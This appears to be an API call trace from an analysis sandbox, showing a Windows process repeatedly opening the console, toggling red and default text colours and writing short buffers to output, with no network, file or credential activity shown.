[0053.615] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0053.615] GetLastError () returned 0x0 [0053.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.616] GetLastError () returned 0x0 [0053.616] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0053.616] GetLastError () returned 0x0 [0053.616] CloseHandle (hObject=0x47) returned 1 [0053.616] GetLastError () returned 0x0 [0053.619] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0053.620] GetLastError () returned 0x0 [0053.620] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.620] GetLastError () returned 0x0 [0053.620] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0053.620] GetLastError () returned 0x0 [0053.620] CloseHandle (hObject=0x47) returned 1 [0053.620] GetLastError () returned 0x0 [0053.620] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x11, lpOverlapped=0x0) returned 1 [0053.621] GetLastError () returned 0x0 [0053.624] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0053.624] GetLastError () returned 0x0 [0053.624] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.624] GetLastError () returned 0x0 [0053.624] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0053.624] GetLastError () returned 0x0 [0053.625] CloseHandle (hObject=0x47) returned 1 [0053.625] GetLastError () returned 0x0 [0053.628] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0053.628] GetLastError () returned 0x0 [0053.628] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.628] GetLastError () returned 0x0 [0053.628] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0053.629] GetLastError () returned 0x0 [0053.629] CloseHandle (hObject=0x47) returned 1 [0053.629] GetLastError () returned 0x0 [0053.629] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.630] GetLastError () returned 0x0 [0053.633] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0053.633] GetLastError () returned 0x0 [0053.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.633] GetLastError () returned 0x0 [0053.633] GetConsoleOutputCP () returned 0x1b5 [0053.633] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.633] GetLastError () returned 0x0 [0053.637] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0053.637] GetLastError () returned 0x0 [0053.637] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.637] GetLastError () returned 0x0 [0053.640] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0053.640] GetLastError () returned 0x0 [0053.640] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.641] GetLastError () returned 0x0 [0053.644] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0053.644] GetLastError () returned 0x0 [0053.644] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.644] GetLastError () returned 0x0 [0053.644] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0053.644] GetLastError () returned 0x0 [0053.644] CloseHandle (hObject=0x53) returned 1 [0053.645] GetLastError () returned 0x0 [0053.648] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0053.648] GetLastError () returned 0x0 [0053.648] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.649] GetLastError () returned 0x0 [0053.649] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0053.649] GetLastError () returned 0x0 [0053.649] CloseHandle (hObject=0x53) returned 1 [0053.649] GetLastError () returned 0x0 [0053.649] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x21, lpOverlapped=0x0) returned 1 [0053.649] GetLastError () returned 0x0 [0053.652] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0053.653] GetLastError () returned 0x0 [0053.653] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.653] GetLastError () returned 0x0 [0053.653] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0053.653] GetLastError () returned 0x0 [0053.653] CloseHandle (hObject=0x53) returned 1 [0053.653] GetLastError () returned 0x0 [0053.657] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0053.657] GetLastError () returned 0x0 [0053.657] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.657] GetLastError () returned 0x0 [0053.657] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0053.657] GetLastError () returned 0x0 [0053.657] CloseHandle (hObject=0x53) returned 1 [0053.658] GetLastError () returned 0x0 [0053.658] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.658] GetLastError () returned 0x0 [0053.661] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0053.662] GetLastError () returned 0x0 [0053.662] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.662] GetLastError () returned 0x0 [0053.662] GetConsoleOutputCP () returned 0x1b5 [0053.662] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.662] GetLastError () returned 0x0 [0053.665] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0053.666] GetLastError () returned 0x0 [0053.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.666] GetLastError () returned 0x0 [0053.670] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0053.670] GetLastError () returned 0x0 [0053.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.670] GetLastError () returned 0x0 [0053.674] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0053.674] GetLastError () returned 0x0 [0053.674] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.674] GetLastError () returned 0x0 [0053.674] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0053.674] GetLastError () returned 0x0 [0053.674] CloseHandle (hObject=0x5f) returned 1 [0053.675] GetLastError () returned 0x0 [0053.678] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0053.678] GetLastError () returned 0x0 [0053.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.678] GetLastError () returned 0x0 [0053.678] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0053.679] GetLastError () returned 0x0 [0053.679] CloseHandle (hObject=0x5f) returned 1 [0053.679] GetLastError () returned 0x0 [0053.679] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x4f, lpOverlapped=0x0) returned 1 [0053.679] GetLastError () returned 0x0 [0053.682] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0053.683] GetLastError () returned 0x0 [0053.683] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.683] GetLastError () returned 0x0 [0053.683] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0053.683] GetLastError () returned 0x0 [0053.683] CloseHandle (hObject=0x5f) returned 1 [0053.683] GetLastError () returned 0x0 [0053.687] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0053.687] GetLastError () returned 0x0 [0053.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.687] GetLastError () returned 0x0 [0053.687] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0053.687] GetLastError () returned 0x0 [0053.687] CloseHandle (hObject=0x5f) returned 1 [0053.688] GetLastError () returned 0x0 [0053.688] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.688] GetLastError () returned 0x0 [0053.691] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0053.692] GetLastError () returned 0x0 [0053.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.692] GetLastError () returned 0x0 [0053.692] GetConsoleOutputCP () returned 0x1b5 [0053.692] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.692] GetLastError () returned 0x0 [0053.695] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0053.695] GetLastError () returned 0x0 [0053.695] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.696] GetLastError () returned 0x0 [0053.699] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0053.699] GetLastError () returned 0x0 [0053.699] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.699] GetLastError () returned 0x0 [0053.702] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0053.702] GetLastError () returned 0x0 [0053.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.703] GetLastError () returned 0x0 [0053.703] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0053.703] GetLastError () returned 0x0 [0053.703] CloseHandle (hObject=0x6b) returned 1 [0053.703] GetLastError () returned 0x0 [0053.706] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0053.707] GetLastError () returned 0x0 [0053.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.707] GetLastError () returned 0x0 [0053.707] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0053.707] GetLastError () returned 0x0 [0053.707] CloseHandle (hObject=0x6b) returned 1 [0053.708] GetLastError () returned 0x0 [0053.708] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x19, lpOverlapped=0x0) returned 1 [0053.708] GetLastError () returned 0x0 [0053.711] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0053.711] GetLastError () returned 0x0 [0053.711] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.711] GetLastError () returned 0x0 [0053.712] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0053.712] GetLastError () returned 0x0 [0053.712] CloseHandle (hObject=0x6b) returned 1 [0053.712] GetLastError () returned 0x0 [0053.715] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0053.715] GetLastError () returned 0x0 [0053.715] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.716] GetLastError () returned 0x0 [0053.716] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0053.716] GetLastError () returned 0x0 [0053.716] CloseHandle (hObject=0x6b) returned 1 [0053.716] GetLastError () returned 0x0 [0053.716] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.717] GetLastError () returned 0x0 [0053.720] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0053.720] GetLastError () returned 0x0 [0053.720] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.720] GetLastError () returned 0x0 [0053.720] GetConsoleOutputCP () returned 0x1b5 [0053.720] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.720] GetLastError () returned 0x0 [0053.724] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0053.724] GetLastError () returned 0x0 [0053.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.724] GetLastError () returned 0x0 [0053.727] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0053.727] GetLastError () returned 0x0 [0053.727] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.728] GetLastError () returned 0x0 [0053.731] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0053.731] GetLastError () returned 0x0 [0053.731] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.731] GetLastError () returned 0x0 [0053.731] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0053.731] GetLastError () returned 0x0 [0053.731] CloseHandle (hObject=0x77) returned 1 [0053.732] GetLastError () returned 0x0 [0053.735] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0053.735] GetLastError () returned 0x0 [0053.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.735] GetLastError () returned 0x0 [0053.735] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0053.735] GetLastError () returned 0x0 [0053.736] CloseHandle (hObject=0x77) returned 1 [0053.736] GetLastError () returned 0x0 [0053.736] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x36, lpOverlapped=0x0) returned 1 [0053.736] GetLastError () returned 0x0 [0053.739] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0053.740] GetLastError () returned 0x0 [0053.740] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.740] GetLastError () returned 0x0 [0053.740] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0053.740] GetLastError () returned 0x0 [0053.740] CloseHandle (hObject=0x77) returned 1 [0053.740] GetLastError () returned 0x0 [0053.744] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0053.744] GetLastError () returned 0x0 [0053.744] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.744] GetLastError () returned 0x0 [0053.744] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0053.744] GetLastError () returned 0x0 [0053.744] CloseHandle (hObject=0x77) returned 1 [0053.744] GetLastError () returned 0x0 [0053.745] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.745] GetLastError () returned 0x0 [0053.748] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0053.748] GetLastError () returned 0x0 [0053.748] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5c8eab8 | out: lpConsoleScreenBufferInfo=0x5c8eab8) returned 1 [0053.749] GetLastError () returned 0x0 [0053.749] GetConsoleOutputCP () returned 0x1b5 [0053.749] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.749] GetLastError () returned 0x0 [0053.752] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0053.752] GetLastError () returned 0x0 [0053.752] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.752] GetLastError () returned 0x0 [0053.755] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0053.756] GetLastError () returned 0x0 [0053.756] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5c8ea58 | out: lpConsoleScreenBufferInfo=0x5c8ea58) returned 1 [0053.756] GetLastError () returned 0x0 [0053.759] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0053.760] GetLastError () returned 0x0 [0053.760] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.760] GetLastError () returned 0x0 [0053.760] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0053.760] GetLastError () returned 0x0 [0053.760] CloseHandle (hObject=0x83) returned 1 [0053.760] GetLastError () returned 0x0 [0053.763] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0053.764] GetLastError () returned 0x0 [0053.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5c8ea60 | out: lpConsoleScreenBufferInfo=0x5c8ea60) returned 1 [0053.764] GetLastError () returned 0x0 [0053.764] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0053.764] GetLastError () returned 0x0 [0053.764] CloseHandle (hObject=0x83) returned 1 [0053.764] GetLastError () returned 0x0 [0053.764] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8ea64, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8ea64*=0x1, lpOverlapped=0x0) returned 1 [0053.765] GetLastError () returned 0x0 [0053.768] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0053.768] GetLastError () returned 0x0 [0053.768] GetConsoleScreenBufferInfo (in: 